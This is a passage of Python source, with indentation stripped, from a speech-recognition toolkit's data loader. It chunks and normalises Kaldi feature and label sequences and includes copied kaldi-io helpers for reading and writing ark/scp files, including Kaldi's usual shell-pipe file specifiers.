fea_conc.append(fea_chunked[j])
lab_conc.append(lab_chunked[j])
if len(fea_chunked) > 1:
snt_name.append(name+'_split'+str(j))
else:
snt_name.append(k)
return fea_conc, lab_conc
def _chunk(max_sequence_length, fea, lab, fea_only):
def _chunk_by_input_and_output_chunk_config(chunk_config, fea, lab, fea_only):
'''
If the sequence length is above the threshold, we split it with a minimal length max/4
If max length = 500, then the split will start at 500 + (500/4) = 625.
A seq of length 625 will be splitted in one of 500 and one of 125
'''
chunk_size_fea, chunk_step_fea, chunk_size_lab, chunk_step_lab = chunk_config['chunk_size_fea'], chunk_config['chunk_step_fea'], chunk_config['chunk_size_lab'], chunk_config['chunk_step_lab']
fea_chunked = list()
lab_chunked = list()
split_threshold_fea = chunk_size_fea + (chunk_size_fea/4)
if(len(fea) > chunk_size_fea) and chunk_size_fea>0:
nr_of_chunks = (len(fea) + chunk_size_fea - 1) // chunk_size_fea
for i in range(nr_of_chunks):
chunk_start_fea = i * chunk_step_fea
if(len(fea[chunk_start_fea:]) > split_threshold_fea):
chunk_end_fea = chunk_start_fea + chunk_size_fea
fea_chunk = fea[chunk_start_fea:chunk_end_fea]
if not fea_only:
chunk_start_lab = i * chunk_step_lab
chunk_end_lab = chunk_start_lab + chunk_size_lab
lab_chunk = lab[chunk_start_lab:chunk_end_lab]
else:
lab_chunk = np.zeros((fea_chunk.shape[0],))
fea_chunked.append(fea_chunk)
lab_chunked.append(lab_chunk)
else:
fea_chunk = fea[chunk_start_fea:]
if not fea_only:
chunk_start_lab = i * chunk_step_lab
lab_chunk = lab[chunk_start_lab:]
else:
lab_chunk = np.zeros((fea_chunk.shape[0],))
lab_chunked.append(lab_chunk)
fea_chunked.append(fea_chunk)
break
else:
fea_chunked.append(fea)
if not fea_only:
lab_chunked.append(lab)
else:
lab_chunked.append(np.zeros((fea.shape[0],)))
return fea_chunked, lab_chunked
chunk_config = dict()
if type(max_sequence_length) == dict:
chunk_config['chunk_size_fea'] = max_sequence_length['chunk_size_fea']
chunk_config['chunk_step_fea'] = max_sequence_length['chunk_step_fea']
chunk_config['chunk_size_lab'] = max_sequence_length['chunk_size_lab']
chunk_config['chunk_step_lab'] = max_sequence_length['chunk_step_lab']
elif type(max_sequence_length) == int:
chunk_config['chunk_size_fea'] = max_sequence_length
chunk_config['chunk_step_fea'] = max_sequence_length
chunk_config['chunk_size_lab'] = max_sequence_length
chunk_config['chunk_step_lab'] = max_sequence_length
else:
raise ValueError('Unknown type of max_sequence_length')
return _chunk_by_input_and_output_chunk_config(chunk_config, fea, lab, fea_only)
snt_name = list()
fea_conc = list()
lab_conc = list()
feature_keys_soted_by_sequence_length = sorted(sorted(fea.keys()), key=lambda k: len(fea[k]))
for k in feature_keys_soted_by_sequence_length:
fea_el = fea[k]
lab_el = None
if not fea_only:
lab_el = lab[k]
fea_chunked, lab_chunked = _chunk(max_sequence_length, fea_el, lab_el, fea_only)
fea_conc, lab_conc = _append_to_concat_list(fea_chunked, lab_chunked, fea_conc, lab_conc, k)
return fea_conc, lab_conc, snt_name
def _concatenate_features_and_labels(fea_conc, lab_conc):
def _sort_chunks_by_length(fea_conc, lab_conc):
fea_zipped = zip(fea_conc,lab_conc)
fea_sorted = sorted(fea_zipped, key=lambda x: x[0].shape[0])
fea_conc,lab_conc = zip(*fea_sorted)
return fea_conc, lab_conc
def _get_end_index_from_list(conc):
end_snt=0
end_index=list()
for entry in conc:
end_snt=end_snt+entry.shape[0]
end_index.append(end_snt)
return end_index
fea_conc, lab_conc = _sort_chunks_by_length(fea_conc, lab_conc)
end_index_fea = _get_end_index_from_list(fea_conc)
end_index_lab = _get_end_index_from_list(lab_conc)
fea_conc=np.concatenate(fea_conc)
lab_conc=np.concatenate(lab_conc)
return fea_conc, lab_conc, end_index_fea, end_index_lab
def _match_feature_and_label_sequence_lengths(fea, lab, max_sequence_length):
ALLOW_FRAME_DIFF_LARGER_ONE = False
def _adjust_feature_sequence_length(fea, nr_of_fea_for_lab):
nr_of_fea = fea.shape[0]
if nr_of_fea > nr_of_fea_for_lab:
fea_adj = np.take(fea, range(nr_of_fea_for_lab), axis=0)
elif nr_of_fea < nr_of_fea_for_lab:
padding = np.zeros(shape=(nr_of_fea_for_lab-nr_of_fea,) + fea.shape[1:])
fea_adj = np.concatenate([fea, padding], axis=0)
else:
fea_adj = fea
return fea_adj
chunk_size_fea = max_sequence_length['chunk_size_fea']
chunk_step_fea = max_sequence_length['chunk_step_fea']
chunk_size_lab = max_sequence_length['chunk_size_lab']
chunk_step_lab = max_sequence_length['chunk_step_lab']
window_shift = max_sequence_length['window_shift']
window_size = max_sequence_length['window_size']
for k in fea.keys():
nr_of_fea = fea[k].shape[0]
nr_of_lab = lab[k].shape[0]
nr_of_fea_for_lab = (nr_of_lab - 1) * window_shift + window_size
if abs(nr_of_fea - nr_of_fea_for_lab) > window_shift and not ALLOW_FRAME_DIFF_LARGER_ONE:
raise ValueError('Nr. of features: ' + str(nr_of_fea) + ' does not match nr. of labels: ' + str(nr_of_lab) + ' with expected nr. of features: ' + str(nr_of_fea_for_lab))
fea[k] = _adjust_feature_sequence_length(fea[k], nr_of_fea_for_lab)
return fea, lab
fea, lab = _read_features_and_labels_with_kaldi(fea_scp, fea_opts, fea_only, lab_folder, lab_opts, output_folder)
if _input_is_wav_file(fea_scp) and (not fea_only):
fea, lab = _match_feature_and_label_sequence_lengths(fea, lab, max_sequence_length)
fea_chunks, lab_chunks, chunk_names = _chunk_features_and_labels(max_sequence_length, fea, lab, fea_only, _input_is_wav_file(fea_scp))
fea_conc, lab_conc, end_index_fea, end_index_lab = _concatenate_features_and_labels(fea_chunks, lab_chunks)
return [chunk_names,fea_conc,lab_conc,np.asarray(end_index_fea),np.asarray(end_index_lab)]
def context_window_old(fea,left,right):
N_row=fea.shape[0]
N_fea=fea.shape[1]
frames = np.empty((N_row-left-right, N_fea*(left+right+1)))
for frame_index in range(left,N_row-right):
right_context=fea[frame_index+1:frame_index+right+1].flatten() # right context
left_context=fea[frame_index-left:frame_index].flatten() # left context
current_frame=np.concatenate([left_context,fea[frame_index],right_context])
frames[frame_index-left]=current_frame
return frames
def context_window(fea,left,right):
N_elem=fea.shape[0]
N_fea=fea.shape[1]
fea_conc=np.empty([N_elem,N_fea*(left+right+1)])
index_fea=0
for lag in range(-left,right+1):
fea_conc[:,index_fea:index_fea+fea.shape[1]]=np.roll(fea,lag,axis=0)
index_fea=index_fea+fea.shape[1]
fea_conc=fea_conc[left:fea_conc.shape[0]-right]
return fea_conc
def load_chunk(fea_scp,fea_opts,lab_folder,lab_opts,left,right,max_sequence_length, output_folder,fea_only=False):
# open the file
[data_name,data_set,data_lab,end_index_fea,end_index_lab]=load_dataset(fea_scp,fea_opts,lab_folder,lab_opts,left,right, max_sequence_length, output_folder, fea_only)
# TODO: currently end_index_lab is ignored
# Context window
if left!=0 or right!=0:
data_set=context_window(data_set,left,right)
end_index_fea=end_index_fea-left
end_index_fea[-1]=end_index_fea[-1]-right
# mean and variance normalization
data_set=(data_set-np.mean(data_set,axis=0))/np.std(data_set,axis=0)
# Label processing
data_lab=data_lab-data_lab.min()
if right>0:
data_lab=data_lab[left:-right]
else:
data_lab=data_lab[left:]
data_set=np.column_stack((data_set, data_lab))
return [data_name,data_set,end_index_fea]
def load_counts(class_counts_file):
with open(class_counts_file) as f:
row = next(f).strip().strip('[]').strip()
counts = np.array([ np.float32(v) for v in row.split() ])
return counts
def read_lab_fea_refac01(cfg_file, fea_only, shared_list, output_folder):
def _read_chunk_specific_config(cfg_file):
if not(os.path.exists(cfg_file)):
sys.stderr.write('ERROR: The config file %s does not exist!\n'%(cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
return config
def _read_from_config(config, fea_only):
def _get_max_seq_length_from_config_str(config_str):
max_seq_length=[int(e) for e in config_str.split(',')]
if len(max_seq_length) == 1:
max_seq_length = max_seq_length[0]
else:
assert len(max_seq_length) == 6
max_seq_length_list = max_seq_length
max_seq_length = dict()
max_seq_length['chunk_size_fea'] = max_seq_length_list[0]
max_seq_length['chunk_step_fea'] = max_seq_length_list[1]
max_seq_length['chunk_size_lab'] = max_seq_length_list[2]
max_seq_length['chunk_step_lab'] = max_seq_length_list[3]
max_seq_length['window_shift'] = max_seq_length_list[4]
max_seq_length['window_size'] = max_seq_length_list[5]
return max_seq_length
to_do=config['exp']['to_do']
if to_do=='train':
max_seq_length=_get_max_seq_length_from_config_str(config['batches']['max_seq_length_train'])
if to_do=='valid':
max_seq_length=_get_max_seq_length_from_config_str(config['batches']['max_seq_length_valid'])
if to_do=='forward':
max_seq_length=-1 # do to break forward sentences
fea_only=True
fea_dict, lab_dict, arch_dict = dict_fea_lab_arch(config, fea_only)
seq_model = is_sequential_dict(config, arch_dict)
return to_do, max_seq_length, fea_dict, lab_dict, arch_dict, seq_model
def _read_features_and_labels(fea_dict, lab_dict, max_seq_length, fea_only, output_folder):
def _get_fea_config_from_dict(fea_dict_entr):
fea_scp = fea_dict_entr[1]
fea_opts = fea_dict_entr[2]
cw_left = int(fea_dict_entr[3])
cw_right = int(fea_dict_entr[4])
return fea_scp, fea_opts, cw_left, cw_right
def _get_lab_config_from_dict(lab_dict_entr, fea_only):
if fea_only:
lab_folder = None
lab_opts = None
else:
lab_folder = lab_dict_entr[1]
lab_opts = lab_dict_entr[2]
return lab_folder, lab_opts
def _compensate_for_different_context_windows(data_set_fea, data_set_lab, cw_left_max, cw_left, cw_right_max, cw_right, data_end_index_fea, data_end_index_lab):
data_set_lab = np.take(data_set_lab, range(cw_left_max-cw_left,data_set_lab.shape[0]-(cw_right_max-cw_right)), axis=0, mode='clip')
data_set_fea = np.take(data_set_fea, range(cw_left_max-cw_left,data_set_fea.shape[0]-(cw_right_max-cw_right)), axis=0, mode='clip')
data_end_index_fea = data_end_index_fea - (cw_left_max - cw_left)
data_end_index_lab = data_end_index_lab - (cw_left_max - cw_left)
data_end_index_fea[-1] = data_end_index_fea[-1] - (cw_right_max - cw_right)
data_end_index_lab[-1] = data_end_index_lab[-1] - (cw_right_max - cw_right)
return data_set_lab, data_set_fea, data_end_index_fea, data_end_index_lab
def _update_data(data_set, labs, fea_dict, fea, fea_index, data_set_fea, labs_fea, cnt_fea, cnt_lab):
if cnt_fea==0 and cnt_lab==0:
data_set=data_set_fea
labs=labs_fea
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
elif cnt_fea==0 and (not cnt_lab==0):
labs=np.column_stack((labs,labs_fea))
elif (not cnt_fea==0) and cnt_lab==0:
data_set=np.column_stack((data_set,data_set_fea))
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
return data_set, labs, fea_dict, fea_index
def _check_consistency(data_name, data_name_fea, data_end_index_fea_ini, data_end_index_fea, data_end_index_lab_ini, data_end_index_lab):
if not (data_name == data_name_fea):
sys.stderr.write('ERROR: different sentence ids are detected for the different features. Plase check again input feature lists"\n')
sys.exit(0)
if not (data_end_index_fea_ini == data_end_index_fea).all():
sys.stderr.write('ERROR end_index must be the same for all the sentences"\n')
sys.exit(0)
if not (data_end_index_lab_ini == data_end_index_lab).all():
sys.stderr.write('ERROR end_index must be the same for all the sentences"\n')
sys.exit(0)
def _update_lab_dict(lab_dict, data_set):
cnt_lab=0
for lab in lab_dict.keys():
lab_dict[lab].append(data_set.shape[1]+cnt_lab)
cnt_lab=cnt_lab+1
return lab_dict
def _load_chunk_refac01(fea_scp,fea_opts,lab_folder,lab_opts,left,right,max_sequence_length, output_folder,fea_only=False):
[data_name,data_set,data_lab,end_index_fea,end_index_lab]=load_dataset(fea_scp,fea_opts,lab_folder,lab_opts,left,right, max_sequence_length, output_folder, fea_only)
# TODO: this function will currently only work well if no context window is given or fea and lab have the same time dimensionality
# Context window
if left!=0 or right!=0:
data_set=context_window(data_set,left,right)
end_index_fea = end_index_fea - left
end_index_lab = end_index_lab - left
end_index_fea[-1] = end_index_fea[-1] - right
end_index_lab[-1] = end_index_lab[-1] - right
# mean and variance normalization
data_set=(data_set-np.mean(data_set,axis=0))/np.std(data_set,axis=0)
# Label processing
data_lab=data_lab-data_lab.min()
if right>0:
data_lab=data_lab[left:-right]
else:
data_lab=data_lab[left:]
if len(data_set.shape) == 1:
data_set = np.expand_dims(data_set, -1)
return [data_name, data_set, data_lab, end_index_fea, end_index_lab]
cw_left_max, cw_right_max = compute_cw_max(fea_dict)
fea_index=0
cnt_fea=0
data_name = None
data_end_index_fea_ini = None
data_end_index_lab_ini = None
data_set = None
labs = None
for fea in fea_dict.keys():
fea_scp, fea_opts, cw_left, cw_right = _get_fea_config_from_dict(fea_dict[fea])
cnt_lab=0
if fea_only:
lab_dict.update({'lab_name':'none'})
for lab in lab_dict.keys():
lab_folder, lab_opts = _get_lab_config_from_dict(lab_dict[lab], fea_only)
data_name_fea, data_set_fea, data_set_lab, data_end_index_fea, data_end_index_lab = _load_chunk_refac01(fea_scp, fea_opts, lab_folder, lab_opts, cw_left, cw_right, max_seq_length, output_folder, fea_only)
if sum([abs(e) for e in [cw_left_max, cw_right_max, cw_left, cw_right]]) != 0:
data_set_lab, data_set_fea, data_end_index_fea, data_end_index_lab = _compensate_for_different_context_windows(data_set_fea, data_set_lab, cw_left_max, cw_left, cw_right_max, cw_right, data_end_index_fea, data_end_index_lab)
if cnt_fea == 0 and cnt_lab == 0:
data_end_index_fea_ini = data_end_index_fea
data_end_index_lab_ini = data_end_index_lab
data_name = data_name_fea
data_set, labs, fea_dict, fea_index = _update_data(data_set, labs, fea_dict, fea, fea_index, data_set_fea, data_set_lab, cnt_fea, cnt_lab)
_check_consistency(data_name, data_name_fea, data_end_index_fea_ini, data_end_index_fea, data_end_index_lab_ini, data_end_index_lab)
cnt_lab=cnt_lab+1
cnt_fea=cnt_fea+1
if not fea_only:
lab_dict = _update_lab_dict(lab_dict, data_set)
return data_name, data_end_index_fea_ini, data_end_index_lab_ini, fea_dict, lab_dict, data_set, labs
def _reorder_data_set(data_set, labs, seq_model, to_do):
if not(seq_model) and to_do != 'forward' and (data_set.shape[0] == labs.shape[0]):
data_set_shape = data_set.shape[1]
data_set_joint = np.column_stack((data_set,labs))
np.random.shuffle(data_set)
data_set = data_set_joint[:, :data_set_shape]
labs = np.squeeze(data_set_joint[:, data_set_shape:], axis=-1)
return data_set, labs
def _append_to_shared_list(shared_list, data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set):
shared_list.append(data_name)
shared_list.append(data_end_index_fea)
shared_list.append(data_end_index_lab)
shared_list.append(fea_dict)
shared_list.append(lab_dict)
shared_list.append(arch_dict)
shared_list.append(data_set)
return shared_list
config = _read_chunk_specific_config(cfg_file)
to_do, max_seq_length, fea_dict, lab_dict, arch_dict, seq_model = _read_from_config(config, fea_only)
data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, data_set, labs = _read_features_and_labels(fea_dict, lab_dict, max_seq_length, fea_only, output_folder)
data_set, labs = _reorder_data_set(data_set, labs, seq_model, to_do)
data_set = {'input': data_set, 'ref': labs}
shared_list = _append_to_shared_list(shared_list, data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set)
def read_lab_fea(cfg_file,fea_only,shared_list,output_folder):
# Reading chunk-specific cfg file (first argument-mandatory file)
if not(os.path.exists(cfg_file)):
sys.stderr.write('ERROR: The config file %s does not exist!\n'%(cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
# Reading some cfg parameters
to_do=config['exp']['to_do']
if to_do=='train':
max_seq_length=int(config['batches']['max_seq_length_train']) #*(int(info_file[-13:-10])+1) # increasing over the epochs
if to_do=='valid':
max_seq_length=int(config['batches']['max_seq_length_valid'])
if to_do=='forward':
max_seq_length=-1 # do to break forward sentences
[fea_dict,lab_dict,arch_dict]=dict_fea_lab_arch(config,fea_only)
[cw_left_max,cw_right_max]=compute_cw_max(fea_dict)
fea_index=0
cnt_fea=0
for fea in fea_dict.keys():
# reading the features
fea_scp=fea_dict[fea][1]
fea_opts=fea_dict[fea][2]
cw_left=int(fea_dict[fea][3])
cw_right=int(fea_dict[fea][4])
cnt_lab=0
# Production case, we don't have labels (lab_name = none)
if fea_only:
lab_dict.update({'lab_name':'none'})
for lab in lab_dict.keys():
# Production case, we don't have labels (lab_name = none)
if fea_only:
lab_folder=None
lab_opts=None
else:
lab_folder=lab_dict[lab][1]
lab_opts=lab_dict[lab][2]
[data_name_fea,data_set_fea,data_end_index_fea]=load_chunk(fea_scp,fea_opts,lab_folder,lab_opts,cw_left,cw_right,max_seq_length, output_folder, fea_only)
# making the same dimenion for all the features (compensating for different context windows)
labs_fea=data_set_fea[cw_left_max-cw_left:data_set_fea.shape[0]-(cw_right_max-cw_right),-1]
data_set_fea=data_set_fea[cw_left_max-cw_left:data_set_fea.shape[0]-(cw_right_max-cw_right),0:-1]
data_end_index_fea=data_end_index_fea-(cw_left_max-cw_left)
data_end_index_fea[-1]=data_end_index_fea[-1]-(cw_right_max-cw_right)
if cnt_fea==0 and cnt_lab==0:
data_set=data_set_fea
labs=labs_fea
data_end_index=data_end_index_fea
data_end_index=data_end_index_fea
data_name=data_name_fea
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
else:
if cnt_fea==0:
labs=np.column_stack((labs,labs_fea))
if cnt_lab==0:
data_set=np.column_stack((data_set,data_set_fea))
fea_dict[fea].append(fea_index)
fea_index=fea_index+data_set_fea.shape[1]
fea_dict[fea].append(fea_index)
fea_dict[fea].append(fea_dict[fea][6]-fea_dict[fea][5])
# Checks if lab_names are the same for all the features
if not(data_name==data_name_fea):
sys.stderr.write('ERROR: different sentence ids are detected for the different features. Plase check again input feature lists"\n')
sys.exit(0)
# Checks if end indexes are the same for all the features
if not(data_end_index==data_end_index_fea).all():
sys.stderr.write('ERROR end_index must be the same for all the sentences"\n')
sys.exit(0)
cnt_lab=cnt_lab+1
cnt_fea=cnt_fea+1
cnt_lab=0
if not fea_only:
for lab in lab_dict.keys():
lab_dict[lab].append(data_set.shape[1]+cnt_lab)
cnt_lab=cnt_lab+1
data_set=np.column_stack((data_set,labs))
# check automatically if the model is sequential
seq_model=is_sequential_dict(config,arch_dict)
# Randomize if the model is not sequential
if not(seq_model) and to_do!='forward':
np.random.shuffle(data_set)
# Split dataset in many part. If the dataset is too big, we can have issues to copy it into the shared memory (due to pickle limits)
#N_split=10
#data_set=np.array_split(data_set, N_split)
# Adding all the elements in the shared list
shared_list.append(data_name)
shared_list.append(data_end_index)
shared_list.append(fea_dict)
shared_list.append(lab_dict)
shared_list.append(arch_dict)
shared_list.append(data_set)
# The following libraries are copied from kaldi-io-for-python project (https://github.com/vesis84/kaldi-io-for-python)
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, output_folder,mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks in the 'file' argument contains ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], output_folder,'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], output_folder,'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, output_folder,mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
err=open(output_folder+'/log.log',"a")
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,stderr=err)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match('^\S+$',key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd,output_folder):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd,output_folder)
def read_vec_int_ark(file_or_fd,output_folder):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd,output_folder)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd,output_folder):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd,output_folder)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='int32')
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, output_folder, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, output_folder, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd,output_folder):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile,output_folder)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd,output_folder):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd,output_folder)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd,output_folder):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd,output_folder)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
return _read_vec_flt_binary(fd)
elif binary == 'RI':
return _read_vec_flt_riff(fd)
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_vec_flt_riff(fd):
RIFF_CHUNK_DESCR_HEADER_SIZE = 12
ALREADY_READ_HEADER_BYTES = 2
SUB_CHUNK_HEADER_SIZE = 8
DATA_CHUNK_HEADER_SIZE = 8
def pcm2float(signal, dtype='float32'):
signal = np.asarray(signal)
dtype = np.dtype(dtype)
return signal.astype(dtype) / dtype.type(-np.iinfo(signal.dtype).min)
import struct
header = fd.read(RIFF_CHUNK_DESCR_HEADER_SIZE - ALREADY_READ_HEADER_BYTES)
assert header[:2] == b'FF'
chunk_header = fd.read(SUB_CHUNK_HEADER_SIZE)
subchunk_id, subchunk_size = struct.unpack('<4sI', chunk_header)
aformat, channels, samplerate, byterate, block_align, bps = struct.unpack('HHIIHH', fd.read(subchunk_size))
subchunk2_id, subchunk2_size = struct.unpack('<4sI', fd.read(DATA_CHUNK_HEADER_SIZE))
pcm_data = np.frombuffer(fd.read(subchunk2_size), dtype='int' + str(bps))
return pcm2float(pcm_data)
def _read_vec_flt_binary(fd):
header = fd.read(3).decode()
if header == 'FV ' : sample_size = 4 # floats
elif header == 'DV ' : sample_size = 8 # doubles
else : raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='float32')
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, output_folder, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd,output_folder, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd,output_folder):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile,output_folder)
yield key, mat
finally:
